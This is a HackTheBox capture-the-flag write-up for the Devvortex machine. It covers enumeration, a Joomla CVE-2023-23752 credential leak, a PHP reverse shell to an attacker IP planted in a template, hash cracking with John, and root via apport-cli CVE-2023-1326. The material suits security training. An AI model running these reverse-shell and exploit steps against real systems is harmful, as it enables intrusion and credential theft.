Pentest
TryhackmeHackthebox
  • 🐧Linux
    • Lateral Movement
    • PrivilageEsc Linux 👑
  • 🪟Windows
    • Lateral Movement
    • PrivilageEsc Windows 👑
    • Active Directory / SMB
  • ☁️Cloud
    • AWS
    • Docker
    • Azure AD
    • Kubernetes
  • 🛠️Tools
    • File Transfers
    • Shells / Payloads
    • Pivoting / Forwarding
    • Network Enumeration
    • Cracking / Fuzzing / Brute-force
  • 🚐TCP
    • 21 ) FTP
    • 22 ) SSH
    • 25 ) SMTP
    • 53 ) DNS
    • 79 ) Finger
    • 110 ) POP3
    • 143, 993 ) IMAP
    • 389 ) LDAP
    • 443 ) HTTPS
    • 2049 /111 ) NFS /RPC
    • 3128 ) Squid Proxy
    • 3690 ) Subversion
    • 6379 ) Redis
    • 9200 ) Elasticsearch
    • 11211 ) Memcached
    • 24007 & 49152) Gluster
  • 🚎UDP
    • 69 ) TFTP
    • 161 ) SNMP
    • 500, 4500 ) IPsec IKE
    • 623) IPMI
  • 🔟OWASP 10
    • SQLi
    • NoSQLi
    • LFI / XXE
    • Command Injection
    • XSS / HTMLi / (S/C)SRF / SSTI
  • 📚Database
    • Oracle SQL | 1521
    • MSSQL / MYSQL / PSQL
  • 🔗Binary Exploitation
    • Linux
    • Windows
  • 👨‍🚒Red team
    • Reconnaissance
    • Initial Access
    • Persistence Techniques
    • AV Evasion Techniques
  • 🐰Bug Bounty
    • Search Engine
    • Index.html
  • ⌚Links
    • Passwords 1
    • Default Passwords
    • Default passwords 2
  • 🔄Other
    • Git
    • HackerGPT
    • Curl
    • Hints!!
    • Log4j
    • Mobile Sec
    • BookMarks
    • Steganography
    • CMS / Servers / Others
    • Deserialization
    • Tryhackme
  • 🤖Mobile Android Pentest
    • Mobile Sec
    • Drozer
  • Group 1
    • 📦HackTheBox — Writeups
      • 🏴‍☠️HTB - Devvortex
Powered by GitBook
On this page
  • Enumeration Phase:
  • Nmap scan
  • Brute-force hidden directories:
  • Subdomain enumeration:
  • Brute-force hidden directories:
  • Initial Foothold:
  • Owning User:
  • Owning Root:
  1. Group 1
  2. HackTheBox — Writeups

HTB - Devvortex

p0db0t writeup of the easy-difficulty Linux machine Devvortex from https://hackthebox.eu

PreviousHackTheBox — Writeups

Last updated 1 year ago

Enumeration Phase:

Nmap scan

First off, I started my enumeration with an Nmap scan of 10.10.11.242. The options I regularly use are: -sC is the equivalent to --script=default and runs a collection of Nmap enumeration scripts against the target, -sV does a service scan.

nmap -sC -sV 10.10.11.242

I added devvortex.htb to /etc/hosts next to the IP of the box which is 10.10.11.242

Since I still didn't have a way in, the next place to enumerate was HTTP on port 80. Navigating to http://devvortex.htb

Brute-force hidden directories:

gobuster dir -u devvortex.htb -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -fs 200

Subdomain enumeration:

I used also gobuster for this host Subdomain enumeration and found dev.devvortex.htb

gobuster vhost -u devvortex.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt

I added dev.devvortex.htb to /etc/hosts next to the IP of the box which is 10.10.11.242

After visiting http://dev.devvortex.htb

Brute-force hidden directories:

dirsearch -u dev.devvortex.htb

On the Administrator page, I found out that is the login page of Joomla CMS.

On the Readme.txt page, I found out the version of Joomla CMS 4.2.

Initial Foothold:

curl -v 'http://dev.devvortex.htb/api/index.php/v1/config/application?public=true'

After login on to the Administrator page with credentials that I found with Curl, I edited error.php which was located at /template/Cassiopeia/error.php and set up reverse shell script.

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.175/9001 0>&1'");
?>

I ran Netcat to listen to incoming connections and used Curl to trigger a reverse shell at the error.php page.

nc -lvnp 9001
curl http://dev.devvortex.htb/templates/cassiopeia/error.php

Boom! I got the shell as www-data

Owning User:

Credentials that I found with Curl have also a Database name so I went for MySQL checking.

mysql -u lewis -p
show databases;
use joomla
show tables;
select * from sd4fg_users;
echo 'HASH' >> hash.txt

I cracked the hash of Logan using the tool John The Ripper

sudo john --wordlist=/usr/share/wordlists/rockyou.txt --rules hash.txt

Sweet !!!! I log in as a user Logan via SSH.

ssh logan@devvortex.htb

Owning Root:

The sudo -l command gives me some interesting output

sudo -l
sudo apport-cli -c /bin/mysql less
v
!
id

After visiting http://devvortex.htb I decided to brute-force hidden directories with Gobuster and didn't find anything

I decided to brute-force hidden directories with Dirsearch and find /administrator/ and /Readme.txt

I found out that Joomla CMS 4.2 is Vulnerable to CVE-2023-23752 and used the tool Curl to get some sensitive information including the Username and Password of user Lewis. About CVE-2023-23752 more on this link:

Bingo I found the hash of Lewis and saved the hash locally in a .txt file.

I found out that Apport-cli is Vulnerable to CVE-2023-1326 About CVE-2023-1326 more on this link:

📦
🏴‍☠️
😢
🎉
🎉
https://nvd.nist.gov/vuln/detail/CVE-2023-23752
https://bugs.launchpad.net/ubuntu/+source/apport/+bug/2016023